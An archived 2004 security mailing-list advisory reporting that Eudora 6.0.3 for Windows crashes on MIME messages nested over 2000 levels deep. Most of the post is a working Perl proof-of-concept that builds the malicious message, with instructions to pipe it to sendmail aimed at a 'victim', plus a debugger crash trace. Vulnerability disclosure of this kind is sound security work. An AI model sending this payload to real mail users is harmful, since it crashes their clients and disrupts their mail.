lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 14 Apr 2004 13:12:23 +1000 (EST) From: psz@...hs.usyd.edu.au (Paul Szabo) To: NTBugtraq@...tserv.ntbugtraq.com, beckley@...lcomm.com, bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com Subject: Eudora 6.0.3 nested MIME DoS Eudora 6.0.3 for Windows will crash if sent a MIME message nested more than 2000 levels deep. Due to the presence of the [EudoraDir]\spool\*.RCV file, users may find it difficult to recover from this DoS situation. Demo below. Cheers, Paul Szabo - psz@...hs.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia #!/usr/bin/perl -- print "From: me\n"; print "To: you\n"; print "Subject: nested multipart test\n"; print "Mime-Version: 1.0\n"; print "X-Use: Pipe the output of this script into: sendmail -i victim\n"; &nest(0); print "\n"; sub nest { my ($x) = @_; my $b = sprintf("bndry%04d",$x); print "Content-Type: multipart/mixed; boundary=\"$b\"\n\n"; print "--$b\n"; print "Content-Type: text/plain\n\n"; print "Level $x\n\n"; # No problem for 1995, but crash for 2005 deep nesting: # # (378.1c4): Stack overflow - code c00000fd (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=000338a8 edi=62000000 # eip=77f862ed esp=00032f10 ebp=000337b0 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202 # ntdll!LdrLoadAlternateResourceModule+9: # 77f862ed 53 push ebx if ($x < 2005) { print "--$b\n"; &nest($x+1); } print "--$b\n"; print "Content-Type: text/plain\n\n"; print "Final $x\n"; print "--$b--\n\n"; } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists